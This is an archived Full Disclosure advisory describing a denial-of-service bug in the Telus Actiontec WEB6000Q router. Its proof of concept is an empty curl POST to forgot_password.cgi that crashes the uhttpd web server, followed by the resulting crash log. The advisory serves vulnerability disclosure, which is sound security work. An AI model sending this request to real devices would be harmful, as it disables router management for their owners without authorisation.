lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <742f22d5-640d-03b1-a11f-9ec612d90aac@aklaus.ca>
Date: Sun, 9 Jun 2019 12:29:11 -0600
From: Andrew Klaus <andrew@...aus.ca>
To: fulldisclosure@...lists.org
Subject: [FD] Telus Actiontec WEB6000Q Denial of Service of Management
	Interface

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

###  Device Details
Discovered By: Andrew Klaus (andrew@...aus.ca)
Vendor: Actiontec (Telus Branded)
Model: WEB6000Q
Affected Firmware: 1.1.02.22

Reported: July 2018
CVE:  Not needed since update is pushed by the provider.


### Summary of Findings
By querying CGI endpoints with empty (GET/POST/HEAD) requests causes a
Segmentation Fault of the uhttpd webserver. Since there is no watchdog
on this daemon, a device reboot is needed to restart the webserver to
make any modification to the device.

### Proof of Concept:

$ curl -X POST -ik http://192.168.1.2/forgot_password.cgi
curl: (52) Empty reply from server

$ curl -X POST -ik http://192.168.1.2/forgot_password.cgi
curl: (7) Failed to connect to 192.168.1.2 port 80: Connection refused


### UART console output after attack:

<4>[  726.578000] uhttpd/452: potentially unexpected fatal signal 11.
<4>[  726.583000]
<4>[  726.585000] Cpu 1
<4>[  726.587000] $ 0   : 00000000 10008d00 00000000 00000000
<4>[  726.592000] $ 4   : 00000000 00000000 00000000 00000000
<4>[  726.598000] $ 8   : 81010100 3d3d3d3d 77a00000 f0000000
<4>[  726.603000] $12   : 00000001 6570743a 202a2f2a 00416b5c
<4>[  726.608000] $16   : 00000000 00000000 00000000 7fe14ebe
<4>[  726.614000] $20   : 00404c84 775168a0 0046d470 0084ee6c
<4>[  726.619000] $24   : 00000186 00411030
<4>[  726.624000] $28   : 00464620 7fe12800 7fe12800 00416c20
<4>[  726.630000] Hi    : 000000c9
<4>[  726.633000] Lo    : 0001e791
<4>[  726.636000] epc   : 00411078 0x411078
<4>[  726.640000]     Tainted: P
<4>[  726.643000] ra    : 00416c20 0x416c20
<4>[  726.647000] Status: 00008d13    USER EXL IE
<4>[  726.652000] Cause : 00000008
<4>[  726.655000] BadVA : 00000000
<4>[  726.657000] PrId  : 0002a080 (Broadcom BMIPS4350)
<4>[  726.663000]
<4>[  726.663000] Userspace Call Trace: process uhttpd, pid 452, signal
11
<4>[  726.671000] [<00411078>] /sbin/uhttpd
<4>[  726.674000] [<00416c20>] /sbin/uhttpd
<4>[  726.678000] [<00416d68>] /sbin/uhttpd
<4>[  726.682000] [<00407cd4>] /sbin/uhttpd
<4>[  726.686000] [<00416c20>] /sbin/uhttpd
<4>[  726.689000] [<0047cb94>] (unknown)


-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEE/rRUDraOzqmrp8tZoyRid8jQfpkFAlz9T/cACgkQoyRid8jQ
fpl0pQ/8Cy5KVRr9A21pitkXvN4tfSg2xLW3JPCM5u9YTVyat8/OXBJH4fFro0qg
lu47mquRCKEC98IqMfHDiiq7x75iAWTfGOtB3k9Kk4xfdtwdQP8yKy8do8dHr9No
FgmNh0+MFK0fvEju5hyzDDU7jBIAKAcjxQGU974B96ai+7p5yjm0rziwMVRK10UA
Bfc7kIZVAKTxvJkVtThBihkJ2+Szq33j+DwC1F64ePx++SZIJO+sHMY28MU/Kzdb
BmUUfhPQhla0pSZ1S1TTcOzNE+j7YrvQZ8mJ8fVJ7c/tOkG1u7xN/i8DpikF/46Z
nlmERr5wqRHvpsPsrmjEJPOnECRhcK9GRAlxiZJIXExzRv94hwJnGAMVXBqNw/81
GHhwnXW7efQpPNiuV9P9GnNiBuTL5I+eQR6aJn5rMl+h9em8+6YyU6Aguf+z5UJC
eBsaTRHIl6PReTCaBbZR7lOG2KqP485LM7bwDSFej0lRWStmrB624O48Qqr6wbDf
UW639RG4J7J1Qtoc+Gu8PgXcXWV9HY4KH1Edt4cSowveOn1LmQEsmFOeoBC5FKbQ
bIqB1uYTTjmO/ey/ysh2GbXkNym6xNJYa1RCZt+S0T0T/qPjPQa+IVO59lygQhtm
GHNRPP43+TkLyXhvWMjl4Ptat2b/gd99DMqO/VnLqrZEWD2rXx8=
=IEzI
-----END PGP SIGNATURE-----

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ